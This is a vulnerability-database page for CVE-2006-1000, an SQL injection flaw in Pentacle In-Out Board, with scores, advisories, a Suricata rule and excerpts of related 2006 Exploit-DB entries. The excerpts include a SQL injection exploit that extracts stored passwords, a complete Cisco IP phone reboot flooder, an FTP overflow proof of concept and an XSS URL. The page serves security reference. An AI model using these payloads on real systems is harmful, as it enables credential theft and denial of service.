CVE-2006-1000
published 2006-03-06CVE-2006-1000: Multiple SQL injection vulnerabilities in Pentacle In-Out Board 3.0 and earlier allow remote attackers to execute arbitrary SQL commands and bypass…
PriorityP353critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
3.31%
87.0th percentile
Multiple SQL injection vulnerabilities in Pentacle In-Out Board 3.0 and earlier allow remote attackers to execute arbitrary SQL commands and bypass authentication via the (1) newsid parameter to newsdetailsview.asp and (2) password parameter to login.asp.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| g2soft | pentacle_in-out_board | — | — |
CVSS provenance
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vendor_redhat7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-fhm3-h4q6-pq4x: Multiple SQL injection vulnerabilities in Pentacle In-Out Board 3
ghsa_unreviewed·2022-05-01
CVE-2006-1000 [HIGH] GHSA-fhm3-h4q6-pq4x: Multiple SQL injection vulnerabilities in Pentacle In-Out Board 3
Multiple SQL injection vulnerabilities in Pentacle In-Out Board 3.0 and earlier allow remote attackers to execute arbitrary SQL commands and bypass authentication via the (1) newsid parameter to newsdetailsview.asp and (2) password parameter to login.asp.
Red Hat
CVE-2006-6385: Stack-based buffer overflow in Intel PRO 10/100, PRO/1000, and PRO/10GbE PCI, PCI-X, and PCIe network adapter drivers (aka NDIS miniport drivers) befo
vendor_redhat·CVSS 7.2
CVE-2006-6385 [HIGH] CVE-2006-6385: Stack-based buffer overflow in Intel PRO 10/100, PRO/1000, and PRO/10GbE PCI, PCI-X, and PCIe network adapter drivers (aka NDIS miniport drivers) befo
Stack-based buffer overflow in Intel PRO 10/100, PRO/1000, and PRO/10GbE PCI, PCI-X, and PCIe network adapter drivers (aka NDIS miniport drivers) before 20061205 allows local users to execute arbitrary code with "kernel-level" privileges via an incorrect function call in certain OID handlers.
Statement: Not Vulnerable. eEye Research advisory AD20061207 (Intel Network Adapter Driver Local Privilege Escalation) describes a flaw in the Linux Kernel drivers for the e100, e1000, and ixgb Intel network cards. The flaw affects the NDIS miniport drivers and its OID support. The Linux Kernel drivers do not support the NDIS API and the OID concept from Microsoft Windows.
Suricata
GPL VOIP EXPLOIT SIP UDP Softphone overflow attempt
suricata·2010-09-23
CVE-2006-0189 GPL VOIP EXPLOIT SIP UDP Softphone overflow attempt
GPL VOIP EXPLOIT SIP UDP Softphone overflow attempt
Rule: alert udp $EXTERNAL_NET any -> $HOME_NET 5060 (msg:"GPL VOIP EXPLOIT SIP UDP Softphone overflow attempt"; content:"|3B|branch|3D|"; content:"a|3D|"; pcre:"/^a\x3D[^\n]{1000,}/smi"; reference:bugtraq,16213; reference:cve,2006-0189; classtype:misc-attack; sid:2100223; rev:2; metadata:created_at 2010_09_23, cve CVE_2006_0189, confidence Medium, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Exploit-DB
Durian Web Application Server 3.02 - Denial of Service
exploitdb·2006-12-29
CVE-2006-6853 Durian Web Application Server 3.02 - Denial of Service
Durian Web Application Server 3.02 - Denial of Service
---
http://sourceforge.net/projects/durian/
//by rgod mail: retrog at alice dot it site: http://retrogod.altervista.org
error_reporting(E_ALL);
$service_port = "4002";
$address = "192.168.1.3";
$ch =array("\xaa","\xa0","\x41");
$size=array(30,70,150,330,520,700,1400,2300);
$c=1000;
for ($m=1; $m
# milw0rm.com [2006-12-29]
Exploit-DB
AstonSoft DeepBurner 1.8.0 - '.dbr' File Parsing Buffer Overflow
exploitdb·2006-12-19
CVE-2006-6665 AstonSoft DeepBurner 1.8.0 - '.dbr' File Parsing Buffer Overflow
AstonSoft DeepBurner 1.8.0 - '.dbr' File Parsing Buffer Overflow
---
/*
_______ ________ .__ _____ __
___ __\ _ \ ____ \_____ \ | |__ / | | ____ | | __
\ \/ / /_\ \ / \ _(__ __|_ \
\/ \/ \/ \/ 18\12\06 \/ |__| \/ \/
* mm. dM8
* YMMMb. dMM8 _____________________________________
* YMMMMb dMMM' [ ]
* `YMMMb dMMMP [ There are doors I have yet to open ]
* `YMMM MMM' [ windows I have yet to look through ]
* "MbdMP [ Going forward may not be the answer ]
* .dMMMMMM.P [ ]
* dMM MMMMMM [ maybe I should go back ]
* 8MMMMMMMMMMI [_____________________________________]
* YMMMMMMMMM www.netbunny.org
* "MMMMMMP [Happy holidays to everybody]
* MxM .mmm
* W"W """
[i] Title: DeepBurner
#include
#include
#include
// Exploit internals, change only if you know what you are doing
#define BUFFSIZE 1000
//
Exploit-DB
PHP League 0.82 - 'classement.php' SQL Injection
exploitdb·2006-10-27
CVE-2006-5676 PHP League 0.82 - 'classement.php' SQL Injection
PHP League 0.82 - 'classement.php' SQL Injection
---
exploit2.asp
'[Note : If Wrong Id = "CTYPE html PUBLIC..... see"
'[Using : Write Target and ID after Submit Click
'===============================================================================================
%>
Php League v0.82 (classement.php) Remote SQL Injection Exploit
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='There is a problem... The Data Didn\'t Take '
}
}
function write(){
setTimeout("writetext()",1000);
}
Php Leaguev0.82 (classement.p
Exploit-DB
KMail 1.x - HTML Element Handling Denial of Service
exploitdb·2006-10-16
CVE-2006-7139 KMail 1.x - HTML Element Handling Denial of Service
KMail 1.x - HTML Element Handling Denial of Service
---
source: https://www.securityfocus.com/bid/20539/info
KMail is prone to an unspecified denial-of-service vulnerability.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
KMail 1.9.1 and prior versions are vulnerable to this issue.
Return-Path:
X-Original-To: test
Delivered-To: test@torvalds
Received: by torvalds (Postfix, from userid 1000)
id D854F83BF5; Tue, 26 Sep 2006 16:06:36 +0100 (IST)
To: test@torvalds
Content-Type: text/html
Subject: testing
Message-Id:
Date: Tue, 26 Sep 2006 16:06:36 +0100 (IST)
From: nnp@torvalds (nnp)
Status: R
X-Status: NC
X-KMail-EncryptionState:
X-KMail-SignatureState:
X-KMail-MDN-Sent:
Exploit-DB
BomberClone 0.11 - Multiple Vulnerabilities
exploitdb·2006-07-31
CVE-2006-4006 BomberClone 0.11 - Multiple Vulnerabilities
BomberClone 0.11 - Multiple Vulnerabilities
---
// source: https://www.securityfocus.com/bid/19255/info
Bomberclone is prone to remote information-disclosure and denial-of-service vulnerabilities because it fails to properly sanitize user-supplied input.
These issues allow remote attackers to access sensitive information and to crash the application, denying further service to legitimate users.
Version 0.11.6 is reported vulnerable; other versions may also be affected.
/*
by Luigi Auriemma
*/
#include
#include
#include
#include
#include
#include "show_dump.h"
#ifdef WIN32
#include
#include "winerr.h"
#define close closesocket
#define sleep Sleep
#define ONESEC 1000
#else
#include
#include
#include
#include
#include
#include
#define ONESEC 1
#endif
#define VER "0.1"
#define PO
Exploit-DB
Golden FTP Server Pro 2.70 - 'APPE' Remote Buffer Overflow (PoC)
exploitdb·2006-05-03
CVE-2006-2180 Golden FTP Server Pro 2.70 - 'APPE' Remote Buffer Overflow (PoC)
Golden FTP Server Pro 2.70 - 'APPE' Remote Buffer Overflow (PoC)
---
#!/usr/bin/perl
#
# Golden FTP Server Pro 2.70 Remote APPE command PoC exploit : DoS
# /JA
# https://www.securinfos.info
#
use Net::FTP;
$host = @ARGV[0];
$port = @ARGV[1];
$debug = @ARGV[2];
$user = @ARGV[3];
$pass = @ARGV[4];
if (($host) && ($port)) {
# Exploit string (try with a different value if needed)
$exploit_string = "./A" x 1000;
print "Trying to connect to $host:$port\n";
$sock = Net::FTP->new("$host",Port => $port, TimeOut => 60, Debug=> $debug) or die "[-] Connection failed\n";
print "[+] Connect OK!\n";
print "Logging...\n";
if (!$user) {
$user = "test";
$pass = "test";
}
$sock->login($user, $pass);
sleep(1);
$answer = $sock->message;
print $answer ."\n";
print "Sending string...\n";
$sock->quot("APP
Exploit-DB
ENet - Multiple Denial of Service Vulnerabilities
exploitdb·2006-03-13
CVE-2006-1194 ENet - Multiple Denial of Service Vulnerabilities
ENet - Multiple Denial of Service Vulnerabilities
---
// source: https://www.securityfocus.com/bid/17087/info
ENet is prone to multiple denial-of-service vulnerabilities. A remote attacker can send specifically crafted data to trigger these flaws, leading to a denial-of-service condition.
/*
by Luigi Auriemma
*/
#include
#include
#include
#include
#include "enet_protocol.h"
#ifdef WIN32
#include
#include "winerr.h"
#define close closesocket
#define ONESEC 1000
#define MYRAND clock()
#else
#include
#include
#include
#include
#include
#include
#include
#define ONESEC 1
#define MYRAND times(0)
#define strnicmp strncasecmp
#endif
#define VER "0.1"
u_int get_num(u_char *str);
int send_recv(int sd, u_char *in, int insz, u_char *out, int outsz, int err);
int timeout(int sock);
u_int
Exploit-DB
Woltlab Burning Board 1.1.1/2.x - 'galerie_onfly.php' Cross-Site Scripting
exploitdb·2006-02-27
CVE-2006-1034 Woltlab Burning Board 1.1.1/2.x - 'galerie_onfly.php' Cross-Site Scripting
Woltlab Burning Board 1.1.1/2.x - 'galerie_onfly.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/16843/info
Woltlab Burning Board is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/21new/galerie_data/galerie_onfly.php?abild=9997_mr2_2f2f_blue.jpg&width=600&show=2&inpic=Patriotic%20Hackers%20:=))&col=50&size=10&left=1000&heigh
t=100&vert=0&inpic2=Patriotic%20Hackers&nocomp=0
Exploit-DB
Pentacle In-Out Board 6.03 - 'newsdetailsview' SQL Injection
exploitdb·2006-02-25
CVE-2006-1000 Pentacle In-Out Board 6.03 - 'newsdetailsview' SQL Injection
Pentacle In-Out Board 6.03 - 'newsdetailsview' SQL Injection
---
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com
#Usage: penta.pl
#Original Advisory: http://www.nukedx.com/?viewdoc=14
use IO::Socket;
if(@ARGV +
+ Example: penta.pl sux.com / 1 +
+ Method found & Exploit scripted by nukedx +
+***********************************************************************+
";
exit();
}
#Local variables
$pentaserver = $ARGV[0];
$pentaserver =~ s/(http:\/\/)//eg;
$pentahost = "http://".$pentaserver;
$port = "80";
$pentadir = $ARGV[1];
$pentaid = $ARGV[2];
$pentatar = "newsdetailsview.asp?newsid=";
$pentafinal = "login.asp";
$pentaxp = "11%20union%20select%200,userpassword,0,username,0,0,0,0%20from%20pt_users%20where%20u
Exploit-DB
Cisco IP Phone 7940 - Reboot (Denial of Service)
exploitdb·2006-01-10
CVE-2006-0179 Cisco IP Phone 7940 - Reboot (Denial of Service)
Cisco IP Phone 7940 - Reboot (Denial of Service)
---
#!/usr/bin/perl
# This is made for trashing cisco 7940 ip phones. kokanin made/discovered this.
# A packetcount of 1000 and a packetdelay of 0.002 sent to port 80 makes my
# phone reboot - play with the settings and stuff. PRIVATE PRIVATE PRIVATE!!!
# not private anymore. Vulnerable phones are running ver. 7.0(2.0) using the skinny
# protocol - this is not for the SIP firmware.
use Net::RawIP;
use Time::HiRes;
$pkt = new Net::RawIP;
die "Usage $0 " unless ($ARGV[4]);
$pkt->set({
ip => {
saddr => $ARGV[0],
daddr => $ARGV[1]
},
tcp=> { dest => $ARGV[2],
syn => 1,
seq => 0,
ack => 0}
});
for(1..$ARGV[3]){ $pkt->set({tcp=>{source=>int(rand(65535))}});Time::HiRes::sleep($ARGV[4]); $pkt->send; };
# milw0rm.com [2006-01-10]
No writeups or analysis indexed.
http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042524.htmlhttp://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042525.htmlhttp://secunia.com/advisories/19024http://securitytracker.com/id?1015682http://www.nukedx.com/?viewdoc=13http://www.nukedx.com/?viewdoc=14http://www.securityfocus.com/archive/1/426074/100/0/threadedhttp://www.securityfocus.com/archive/1/426075/100/0/threadedhttp://www.securityfocus.com/bid/16818http://www.vupen.com/english/advisories/2006/0749http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042524.htmlhttp://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042525.htmlhttp://secunia.com/advisories/19024http://securitytracker.com/id?1015682http://www.nukedx.com/?viewdoc=13http://www.nukedx.com/?viewdoc=14http://www.securityfocus.com/archive/1/426074/100/0/threadedhttp://www.securityfocus.com/archive/1/426075/100/0/threadedhttp://www.securityfocus.com/bid/16818http://www.vupen.com/english/advisories/2006/0749
2006-03-06
Published